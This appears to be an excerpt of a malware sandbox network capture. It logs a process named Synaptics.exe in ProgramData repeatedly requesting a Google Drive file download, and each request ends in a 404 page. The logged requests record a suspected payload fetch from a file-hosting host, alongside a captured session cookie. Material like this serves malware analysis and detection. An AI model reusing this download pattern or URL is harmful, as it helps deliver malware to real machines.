                                                                                                                    2024-12-30 10:25:52 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="CeFOYRiO5H3fJeJScjjrGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:52 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    89 | 192.168.2.9 | 49866 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:54 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:54 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:54 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Z03L5bcZ-0HIA5mPzYQO4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    90 | 192.168.2.9 | 49867 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:54 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:54 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:54 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ab1qPa4Lq7XFgoYBZH19PQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    91 | 192.168.2.9 | 49873 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:55 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CGESiphk1iNPU1tJ_wfhyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    92 | 192.168.2.9 | 49871 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:55 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CDN1Tvzq5TMTxAQyzpzg6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    93 | 192.168.2.9 | 49870 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:55 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:55 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7oYeIExfFFz7ZNX2PkjYysp6pY9NwEDg0wMpFb7-uuZI8clsGofU4cAl4NjiKN6EHv
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-isOe_j6ioAJQ7WAly06a2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:55 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:55 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="AcKN200mvmhFCZajnltZ8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:55 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    94 | 192.168.2.9 | 49872 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:55 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:55 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4NwifMZmEHphfp9UN4wU4GMRE4HVThdXF3fZv-t6VSK151IgnRxXR-rLT8hFJuvr2IOnMUNxE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Zu74I3I4jmhFTDayur7sYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:55 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:55 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="6Ki3doqevEe8drJzSGj1VA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:55 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID: 95 | Source IP: 192.168.2.9 | Source Port: 49874 | Destination IP: 142.250.185.78 | Destination Port: 443 | PID: 7464 | Process: C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:56 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:56 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YqgeK3KCBNJObia7XeabZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID: 96 | Source IP: 192.168.2.9 | Source Port: 49875 | Destination IP: 142.250.185.78 | Destination Port: 443 | PID: 7464 | Process: C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:56 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:56 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5PRMttAusoBkEsE4VNGHFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID: 97 | Source IP: 192.168.2.9 | Source Port: 49876 | Destination IP: 142.250.186.97 | Destination Port: 443 | PID: 7464 | Process: C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:56 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:56 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5mUzotdv3RyN70bsUnZV5ja2p9Ohzu6jggwqtSvJpnFYrQ9nv0wlw6XJwUx0nsHpXZlsOkemE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DvN0uf_UebqjHhNxLnrnFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:56 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:56 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="oeGZ8DQHlIfHF_HKF8LTkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:56 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID: 98 | Source IP: 192.168.2.9 | Source Port: 49877 | Destination IP: 142.250.186.97 | Destination Port: 443 | PID: 7464 | Process: C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:56 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:56 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5n1PMPaafd9RNRz0i04F-jp51ZGFUe2IjWY6Uc6aE0XP8LvaO5ykTv3N1RAIMycw-Z
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-srCzE_eNg2l_t1RD-ZG8Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
